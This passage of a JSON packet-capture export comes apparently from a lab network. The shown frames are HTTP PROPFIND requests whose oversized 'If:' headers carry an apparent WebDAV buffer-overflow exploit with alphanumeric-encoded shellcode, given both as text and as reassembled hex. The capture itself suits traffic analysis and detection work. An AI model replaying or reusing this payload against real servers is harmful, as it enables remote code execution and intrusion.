FBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "491"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.871002000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.871002000",
|
||
"frame.time_delta": "0.000005000",
|
||
"frame.time_delta_displayed": "0.003603000",
|
||
"frame.time_relative": "17.121942000",
|
||
"frame.number": "499",
|
||
"frame.len": "277",
|
||
"frame.cap_len": "277",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "263",
|
||
"ip.id": "0x000062eb",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000cd9e",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "35207",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "35207",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "72",
|
||
"tcp.len": "211",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "3170624504",
|
||
"tcp.nxtseq": "1660",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3805305713",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00006ba0",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:86:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:86:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868678",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000375000",
|
||
"tcp.analysis.bytes_in_flight": "1659",
|
||
"tcp.analysis.push_bytes_sent": "1659"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000623000",
|
||
"tcp.time_delta": "0.000005000"
|
||
},
|
||
"tcp.payload": "55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "498",
|
||
"tcp.segment": "499",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1659",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:56:57:6d:6e:62:54:66:6e:49:68:6b:69:48:68:48:45:6b:61:6a:78:6c:51:41:45:77:48:7a:42:43:50:75:49:75:67:54:6f:44:70:7a:6f:47:66:44:46:43:62:69:52:73:52:42:7a:50:4a:51:76:71:4d:64:73:76:55:6c:65:69:55:4b:43:5a:46:66:44:52:51:e4:b1:86:e6:99:b5:e5:95:99:e4:89:ae:e5:99:82:e6:a9:a1:e6:99:b5:e4:a1:b7:e4:95:9a:e4:bd:a2:e6:a1:ae:e4:ad:a6:e6:ad:a5:e5:a9:af:e4:a1:98:e7:99:a5:c8:82:c8:82:e1:8b:80:e6:a0:83:e7:85:88:e5:95:b3:e4:a1:ae:e5:91:a3:e4:ad:a8:e4:bd:82:e7:8d:8b:e7:95:a2:e6:85:95:e6:91:88:e4:bd:b3:e7:85:8c:e5:a5:a9:e4:91:b6:e5:81:82:e4:a9:b1:e6:99:8b:e7:a1:ac:e4:9d:88:e6:b5:92:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:59:58:70:79:58:4c:74:68:78:56:74:46:65:44:56:6e:4b:47:6a:6f:46:6e:4c:70:58:4c:4e:6f:58:78:67:44:4a:66:53:49:51:78:5a:42:76:7a:63:77:74:42:51:50:59:4c:49:62:56:66:51:57:7a:59:72:53:41:7a:46:78:67:4a:61:6d:6c:66:45:5a:78:57:e5:a9:98:e4:89:b7:e4:a9:a8:e7:99:99:e6:a1:aa:e5:89:8f:e4:95:ae:e4:8d:89:e4:89:b4:e4:91:b7:e6:9d:96:e5:9d:a4:e5:91:8c:e7:81:ae:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e5:8d:a4:e4:99:92:e5:8d:8a:e5:9d:ad:e1:8f:80:e6:a0:83:e6:b9:a1:e6:85:84:e4:89:b7:e6:85:85:e5:8d:b3:e6:ad:b9:e6:9d:b7:e7:95:a2:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/VWmnbTfnIhkiHhHEkajxlQAEwHzBCPuIugToDpzoGfDFCbiRsRBzPJQvqMdsvUleiUKCZFfDRQ<52><51><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/YXpyXLthxVtFeDVnKGjoFnLpXLNoXxgDJfSIQxZBvzcwtBQPYLIbVfQWzYrSAzFxgJamlfEZxW<78><57><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "501"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.874286000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.874286000",
|
||
"frame.time_delta": "0.000073000",
|
||
"frame.time_delta_displayed": "0.003284000",
|
||
"frame.time_relative": "17.125226000",
|
||
"frame.number": "508",
|
||
"frame.len": "275",
|
||
"frame.cap_len": "275",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "261",
|
||
"ip.id": "0x0000551e",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000db6d",
|
||
"ip.checksum.status": "2",
|
||
